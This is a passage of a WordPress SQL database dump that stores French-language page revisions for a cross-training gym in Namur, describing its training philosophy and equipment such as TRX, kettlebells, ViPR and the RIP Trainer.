orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-05-24 14:36:30', '2013-05-24 14:36:30', '', 5, 'http://www.crosstrainingcenter.be/?p=34', 0, 'revision', '', 0),
(103, 1, '2013-06-16 13:57:21', '2013-06-16 13:57:21', '', 'picto2', '', 'inherit', 'open', 'open', '', 'picto2', '', '', '2013-06-16 13:57:21', '2013-06-16 13:57:21', '', 5, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png', 0, 'attachment', 'image/png', 0),
(42, 1, '2013-06-13 16:26:32', '2013-06-13 16:26:32', 'Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle, en privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis. Ce dosage subtil définit la qualité de l\'entraînement. Ces 3 buts sont :\r\n<p align=\"center\"><b>PREVENIR</b> – <b>AMELIORER</b> – <b>RECUPERER</b>.</p>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-13 16:26:32', '2013-06-13 16:26:32', '', 5, 'http://www.crosstrainingcenter.be/?p=42', 0, 'revision', '', 0);
INSERT INTO `www_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(53, 1, '2013-06-16 10:24:38', '2013-06-16 10:24:38', 'Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle, en privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis. Ce dosage subtil définit la qualité de l\'entraînement. Ces 3 buts sont :\r\n\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 10:24:38', '2013-06-16 10:24:38', '', 5, 'http://www.crosstrainingcenter.be/?p=53', 0, 'revision', '', 0),
(44, 1, '2013-06-16 08:20:16', '2013-06-16 08:20:16', 'Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle, en privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis. Ce dosage subtil définit la qualité de l\'entraînement. Ces 3 buts sont :\r\n<p align=\"center\"><b><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-41\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x127.png\" width=\"300\" height=\"127\" /></a></b></p>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 08:20:16', '2013-06-16 08:20:16', '', 5, 'http://www.crosstrainingcenter.be/?p=44', 0, 'revision', '', 0),
(46, 1, '2013-06-16 10:02:09', '2013-06-16 10:02:09', 'Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle, en privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis. Ce dosage subtil définit la qualité de l\'entraînement. Ces 3 buts sont :\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-43\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x127.png\" width=\"300\" height=\"127\" /></a>\r\n<p align=\"center\"></p>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 10:02:09', '2013-06-16 10:02:09', '', 5, 'http://www.crosstrainingcenter.be/?p=46', 0, 'revision', '', 0),
(48, 1, '2013-06-16 10:05:33', '2013-06-16 10:05:33', 'Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle, en privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis. Ce dosage subtil définit la qualité de l\'entraînement. Ces 3 buts sont :\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-45\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x127.png\" width=\"300\" height=\"127\" /></a>\r\n\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 10:05:33', '2013-06-16 10:05:33', '', 5, 'http://www.crosstrainingcenter.be/?p=48', 0, 'revision', '', 0),
(50, 1, '2013-06-16 10:09:07', '2013-06-16 10:09:07', 'Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle, en privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis. Ce dosage subtil définit la qualité de l\'entraînement. Ces 3 buts sont :\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-45\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x127.png\" width=\"300\" height=\"127\" /></a>\r\n\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 10:09:07', '2013-06-16 10:09:07', '', 5, 'http://www.crosstrainingcenter.be/?p=50', 0, 'revision', '', 0),
(51, 1, '2013-06-16 10:14:10', '2013-06-16 10:14:10', 'Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle, en privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis. Ce dosage subtil définit la qualité de l\'entraînement. Ces 3 buts sont :\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-45\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x127.png\" width=\"300\" height=\"127\" /></a>\r\n\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 10:14:10', '2013-06-16 10:14:10', '', 5, 'http://www.crosstrainingcenter.be/?p=51', 0, 'revision', '', 0),
(54, 1, '2013-06-16 08:04:06', '2013-06-16 08:04:06', '« Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines. Afin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2>TRX Suspension Training</h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2>Kettlebel</h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2>ViPR</h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2>RIP Trainer</h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 08:04:06', '2013-06-16 08:04:06', '', 22, 'http://www.crosstrainingcenter.be/?p=54', 0, 'revision', '', 0),
(55, 1, '2013-06-16 10:42:17', '2013-06-16 10:42:17', '<blockquote>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2>TRX Suspension Training</h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2>Kettlebel</h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2>ViPR</h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2>RIP Trainer</h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 10:42:17', '2013-06-16 10:42:17', '', 22, 'http://www.crosstrainingcenter.be/?p=55', 0, 'revision', '', 0),
(56, 1, '2013-06-16 10:43:00', '2013-06-16 10:43:00', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2>TRX Suspension Training</h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2>Kettlebel</h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2>ViPR</h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2>RIP Trainer</h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 10:43:00', '2013-06-16 10:43:00', '', 22, 'http://www.crosstrainingcenter.be/?p=56', 0, 'revision', '', 0),
(57, 1, '2013-06-16 10:44:43', '2013-06-16 10:44:43', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2>TRX Suspension Training</h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2>Kettlebel</h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2>ViPR</h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2>RIP Trainer</h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 10:44:43', '2013-06-16 10:44:43', '', 22, 'http://www.crosstrainingcenter.be/?p=57', 0, 'revision', '', 0),
(58, 1, '2013-06-16 10:45:34', '2013-06-16 10:45:34', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n\r\n<table style=\"width: 100%\">\r\n<tr>\r\n<td style=\"width: 50%;padding:5px;\">1\r\n</td>\r\n<td style=\"width: 50%;padding:5px;\">2\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;padding:5px;\">3\r\n</td>\r\n<td style=\"width: 50%;padding:5px;\">4\r\n</td>\r\n</tr>\r\n</table>                 \r\n\r\n\r\n\r\n&nbsp;\r\n<h2>TRX Suspension Training</h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2>Kettlebel</h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2>ViPR</h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2>RIP Trainer</h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 10:45:34', '2013-06-16 10:45:34', '', 22, 'http://www.crosstrainingcenter.be/?p=58', 0, 'revision', '', 0),
(59, 1, '2013-06-16 10:46:19', '2013-06-16 10:46:19', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n\r\n<table style=\"width: 100%\">\r\n<tr>\r\n<td style=\"border:0px;width: 50%;padding:5px;\">1\r\n</td>\r\n<td style=\"border:0px;width: 50%;padding:5px;\">2\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border:0px;width: 50%;padding:5px;\">3\r\n</td>\r\n<td style=\"border:0px;width: 50%;padding:5px;\">4\r\n</td>\r\n</tr>\r\n</table>                 \r\n\r\n\r\n\r\n&nbsp;\r\n<h2>TRX Suspension Training</h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2>Kettlebel</h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement 